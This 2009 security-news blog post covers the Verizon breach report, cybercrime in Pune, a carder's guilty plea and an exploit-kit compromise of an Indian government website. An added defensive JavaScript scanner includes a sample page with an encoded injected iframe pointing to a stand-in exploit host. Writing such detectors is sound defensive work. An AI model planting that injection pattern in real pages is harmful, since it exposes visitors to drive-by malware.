Saturday, July 4, 2009

Quote of the day

Yesterday is a canceled check: Forget it. Tomorrow is a promissory note: Don't count on it. Today is ready cash: Use it!

Edwin C. Bliss


New IT Term of the day

Covert environment

In biometrics terminology, covert or covert environment refers to a biometric sample collection location where individuals in the location are not aware that the sample is being taken. One common covert environment is airport checkpoint security where cameras capture images of travelers that are compared to images on a security watch-list. The image capture and comparison is performed without the traveler's knowledge.

RECORD : 90 data breaches in 2008

By Linda Musthaler, Network World, June 26, 2009


Data breaches continue to plague organizations in virtually every industry. In some breaches, the root cause is fairly obvious -- a lost or stolen laptop or USB stick, for instance. In other cases, it takes a forensic investigation to piece together the details of what happened and how.

The Verizon Business RISK Team is a world-renowned data forensics organization that investigates all sorts of suspected breaches. Since 2004, this team has worked on more than 600 cases. Fortunately for us, the team is willing to share its collective knowledge and provide an analysis of the trends in breaches, including how they happen and what the root causes and contributing factors are.

I featured some of their analysis in my February article, "Don't Be a Data Loss Victim". Since then, the RISK Team has published its latest report, the 2009 Data Breach Investigations Report (DBIR). This is a good read for any organization that is trying to plan where and how to allocate scarce resources. For example, the prevailing wisdom says that company insiders are a major threat for accidentally exposing data or intentionally stealing it. In the experience of the Verizon team -- and mind you, the team's universe is not all breaches, but only the ones its members investigate -- the insider threat is much less significant than those threats that come from outside the company. Knowing this, an organization can plan its defenses accordingly.

The 2009 report focuses on the more than 90 confirmed breaches the team investigated in 2008. The number of sensitive data records exposed through these breaches totals more than 285 million. That's more records exposed in one year than the sum of all the records exposed in the four previous years.

Here are some notable statistics from the 2009 report:

  • 74% of the breaches resulted from external sources. This percentage is just about unchanged from previous years.

  • 91% of all compromised records were linked to organized criminal groups. It's no surprise such groups are after data they can monetize quickly, such as credit card data and financial records.

  • 67% of the breaches were aided by significant errors, such as not applying a patch for a known vulnerability. This statistic is unchanged since previous years, meaning we haven't learned yet how important it is to watch out for the simple things that are in our control.

  • 38% of the 2008 attacks utilized malware to plant the means to steal data. This is trending upward as malware is now an essential component to nearly all large-scale breaches. As the report says, "Hacking gets the criminal in the door, but malware gets him the data."

Network managers can take solace in one bit of information from Verizon's report: a small percentage of 2008 hacks targeted routers, switches and other network devices. What's more, wireless networks are actually a rare attack vector for recent data breaches. (Perhaps network managers learned from the atrocious TJX Companies breach in 2007 in which 94 million accounts were compromised. Hackers utilized outdated wireless network security in retail stores to gain access to unencrypted payment card data.)

Another interesting take-away is the analysis of what types of information assets are often compromised. In the scope of the Verizon investigations, 94% of the breaches (and 99.9% of the pilfered records) are attributed to online assets, including servers and applications. This is significant because many companies fret about data on user systems, in offline storage and in transit across networks and devices. Verizon reports that 17% of the breaches involving only .01% of the data occurred with user systems; 2% of the breaches impacting .04% of the data involved offline data; and no breaches occurred with networks and devices. Bottom line: focus on protecting data on servers and applications.

Understandably, no organization has unlimited resources for data protection, and therefore risk mitigation efforts must be focused. Based on the observations made over five years and across 600 investigations, the Verizon Business RISK Team provides five recommendations for major activities that can greatly help reduce the risk of a data breach:

  • Ensure that essential controls are met.

  • Find, track and assess data.

  • Collect and monitor event logs.

  • Audit user accounts and credentials.

  • Test and review Web applications.

You can read the entire 2009 Data Breach Investigations Report at http://www.verizonbusiness.com/resources/security/reports/2009_databreach_rp.pdf.

GROWTH : Cyber crime cases rise 230 times in 5 years in Pune

01 July 2009



The number of people coming forward with cyber crime complaints is rising significantly. “In a year after the cyber cell of Pune police was started in July 2003 we had received only nine complaints of cyber crime. There is a manifold rise as in the year 2008, we have received 2007 cyber crime complaints,” said Deputy Commissioner of Police (cyber cell) Rajendra Dahale, during the opening ceremony of the “Cop Tech” forum at the Pune police commissionerate on Tuesday.

The “Cop Tech” forum is an initiative of Pune police, NASSCOM and the Data Security Council of India (DSCI) to increase the sharing of ideas and knowledge on cyber security, with the aim of making Pune a cyber safe city. Mentioning cyber crime cases such as the derogatory content about Chattrapati Shivaji Maharaj on Orkut and film star Amol Palekar’s credit card case, Dahale said, “Pune police is doing good in tackling cyber crimes. We have trained many policemen at the cyber lab at Shivajinagar police headquarters. Through “Cop Tech” forum, we expect the IT industry and Pune police will share more knowledge and ideas on cyber safety. Members of ‘Cop Tech’ forum and police would be holding quarterly meeting for the purpose.”

Police commissioner Satyapal Singh then signed a memorandum of understanding (MoU) with NASSCOM, while launching the “Cop Tech” forum.

Pratap Reddy, an IPS officer who is an advisor (cyber security) to NASSCOM, said that this was the first MoU of its kind in the country. “Partnership between the police and industry is appreciated,” Reddy said. Singh said that police would like to learn fast and more on cyber security through the “Cop Tech” forum. Singh suggested that meetings of ‘Cop Tech’ forum members and police should be held every month. “Making the society cyber safe is a challenge. We would like to learn more on cyber safety. There is no time to waste,” Singh said. Rajiv Vaishnav, vice president of NASSCOM, and Anand Deshpande, founder and managing director of Persistent Systems Ltd, also spoke.

GUILTY : 'Hacker's hacker' from San Francisco pleads guilty in $86 million fraud


June 30, 2009


A mild-mannered computer geek people once believed could do no wrong admitted Monday to stealing nearly 2 million credit card numbers, which he and others used to rack up more than $86 million in fraudulent charges.

Max Ray Vision, 36, of San Francisco pleaded guilty in U.S. District Court, Downtown, to two counts of wire fraud. He faces up to 60 years in prison when sentenced Oct. 20 by Senior U.S. District Judge Maurice Cohill.

"Max is kind of a hacker's hacker," said federal public defender Michael Novara, explaining that his client -- known by the Internet aliases "Iceman," "Aphex," "Darkest" and "Digits" -- hacked into computer systems not only of financial institutions and credit-card processing centers but also those of other hackers, to steal information they stole.

"He would do that for various reasons, but basically because he could," Novara said.

Vision changed his name from Max Ray Butler shortly before the Secret Service arrested him in September 2007 at his Bay Area safehouse. Inside, agents found computer equipment storing approximately five terabytes of encrypted data and 1.8 million stolen credit card accounts.

Visa, Mastercard, American Express and Discover lost about $86.4 million through charges on those accounts, Assistant U.S. Attorney Luke Dembosky said.

"These losses were borne by the thousands of banks that issued the cards in question," Dembosky said.

In the 1990s, Vision owned a consulting company that helped companies identify weaknesses in computer systems through "network intrusion detection."

Federal prosecutors in Northern California charged Vision in 2000 with computer crimes for hacking into Pentagon computer systems. He was sentenced to 18 months in prison. Court proceedings revealed that Vision worked as an FBI informant for years before his arrest.

"He's definitely the most interesting hacker case I've seen in over a decade," said Kevin Poulsen, a senior editor for Wired Magazine who attended yesterday's hearing and is writing a book about Vision. "It's pretty unusual for someone to be a good computer-security professional and a good computer criminal."

In 1994, Poulsen went to prison for hacking into a radio station and setting up a contest-rigging scheme. His 51-month prison sentence at the time was the longest ever for a hacking crime.

"I've been a hacker, I've known hackers, and I've written about hackers for a long time," Poulsen said. "(Vision) is definitely the most interesting story I've ever heard."

From 2005 until 2007, Vision and a partner in Los Angeles, Christopher Aragon, established CardersMarket.com as a way to acquire, sell and use stolen credit card and other identity-related information, a practice known as "carding," Dembosky said. The Web site at its peak had approximately 4,500 members worldwide.

It was one of five English-language sites at the time that facilitated computer crimes, Poulsen said. He said Vision hacked into the other four and took them over.

Two Secret Service informants helped bring down Vision's hacking empire, Dembosky said. One gained access to CardersMarket hierarchy after earning Vision's trust. The other purchased 103 stolen credit card numbers and related information. Under the sealed plea deal, three identity theft charges will be dropped.

Federal charges were filed against Vision in Virginia at the same time he was indicted in Pittsburgh, court records show.

Vision disagreed with some details the prosecutor outlined during yesterday's hearing, but agreed he did most of the actions alleged.

"This is me and what I did, in essence," Vision said.

Before his first arrest, people in the computer-security industry believed Vision was one of the good guys, or a white hat. Dragos Ruiu, owner of DragosTech.com in Edmonton, Canada, was a professional acquaintance of Vision.

"He was a real Dr. Jekyll-Mr. Hyde type," Ruiu said. "He was innocuous, and nobody would have pegged him for an underworld mob king."

This ranks as one of the all-time biggest computer hacking jobs, Ruiu said.

"He was really good at attacks," Ruiu said. "Now we know why."

HACKED : Indian Institute of Remote Sensing Website Hacked

Malicious exploit-loading JavaScript code injected in its pages

By Lucian Constantin, Web News Editor

30 June 2009


Security researchers from web security vendor Finjan report that the website of India's Institute of Remote Sensing has been compromised by hackers. An injected IFrame loads exploits from the LuckySploit attack toolkit against visitors.

"Last week, we detected that another website from the Government of India 'iirs-nrsa.gov.in' was compromised by cybercriminals who use it as a malicious code distribution channel," the Finjan malware analysts announce.

The pages of the website have been infected with obfuscated JavaScript that inserts a rogue IFrame. The IFrame is subsequently used to load malicious code from a third-party server and attempts to exploit the website's visitors. "The IFrame created by this script points to malicious content hosted on server in Texas armed with the LuckySploit attack toolkit," the researchers explain.
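A site owner can check their own pages for this kind of injection by listing every IFrame source and flagging hosts that are not on an allowlist. The following is an added example, not code from Finjan or the original article; it assumes the obfuscation is plain percent-encoding inside a script string (real toolkits layer more), and the host names and sample page are constructed.

```javascript
// Added example: flag iframes loaded from hosts outside an allowlist, including
// iframes hidden in percent-encoded string literals inside inline scripts.
// Assumption: single-layer percent-encoding; heavier obfuscation needs a real JS parser.
const IFRAME_RE = /<iframe\b[^>]*?\bsrc\s*=\s*["']?([^"'\s>]+)/gi;
const ENCODED_LITERAL_RE = /["']([^"']*%3c[^"']*)["']/gi; // literal containing an encoded "<"

// Resolve a src (absolute, relative or protocol-relative) to its host name.
function hostOf(src, pageHost) {
  try { return new URL(src, `http://${pageHost}/`).hostname.toLowerCase(); }
  catch { return null; } // unparseable src is reported rather than ignored
}

function iframeFindings(text, pageHost, allowed, origin) {
  const findings = [];
  for (const m of text.matchAll(IFRAME_RE)) {
    const host = hostOf(m[1], pageHost);
    if (host === null || !allowed.has(host)) findings.push({ origin, src: m[1], host });
  }
  return findings;
}

// Returns one finding per iframe whose host is neither the page's own nor allowlisted.
function scanPage(html, pageHost, allowedHosts = []) {
  const allowed = new Set([pageHost, ...allowedHosts].map((h) => h.toLowerCase()));
  const findings = iframeFindings(html, pageHost, allowed, 'static');
  for (const m of html.matchAll(ENCODED_LITERAL_RE)) {
    let decoded;
    try { decoded = decodeURIComponent(m[1]); } catch { continue; } // malformed escapes
    findings.push(...iframeFindings(decoded, pageHost, allowed, 'decoded-script'));
  }
  return findings;
}

// Constructed sample page: one local iframe, one partner iframe, one injected script.
const SAMPLE_PAGE = [
  '<html><body>',
  '<iframe src="/maps/viewer.html" width="600"></iframe>',
  '<iframe src="http://video.partner.example/embed/1"></iframe>',
  '<script>document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2Fkit.invalid' +
    '%2Fin.php%22%20width%3D%221%22%20height%3D%221%22%3E%3C%2Fiframe%3E"));</script>',
  '</body></html>',
].join('\n');

console.log(scanPage(SAMPLE_PAGE, 'www.site.example', ['video.partner.example']));
```

Run against every published page after each deployment; any finding with origin `decoded-script` deserves immediate review, since legitimate pages rarely build IFrames from encoded strings.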

LuckySploit uses a collection of exploits for vulnerabilities in the operating system, browsers or other popular software such as Adobe Flash and Adobe Reader. After obtaining access to the server, the analysts looked at the referrer statistics from the LuckySploit administration panel. According to these, iirs-nrsa.gov.in had 500 hits from 157 unique users since it was compromised. Despite these relatively low numbers, the successful infection rate is pretty high, at 17.8% (28 users).

What's even more worrying is the total number of successful infections (11,798) on all the websites compromised by this group of hackers. The Finjan security researchers warn that, "The exploit page was detected by only 4 out of 40 AV engines at Virus Total."

Last month, the security vendor reported a similar infection, using the Fiesta attack toolkit, on another Indian government website, belonging to the Union Public Service Commission. "We notified CERT India about this issue; trusting that the problem will be fixed soon," the company noted, regarding this latest incident.

Back in January, we reported that the website belonging to the Indian Embassy in Spain had been compromised in a similar way, while later, in February, India's Ministry of External Affairs was confronted with a serious security breach after spyware was found on its network.
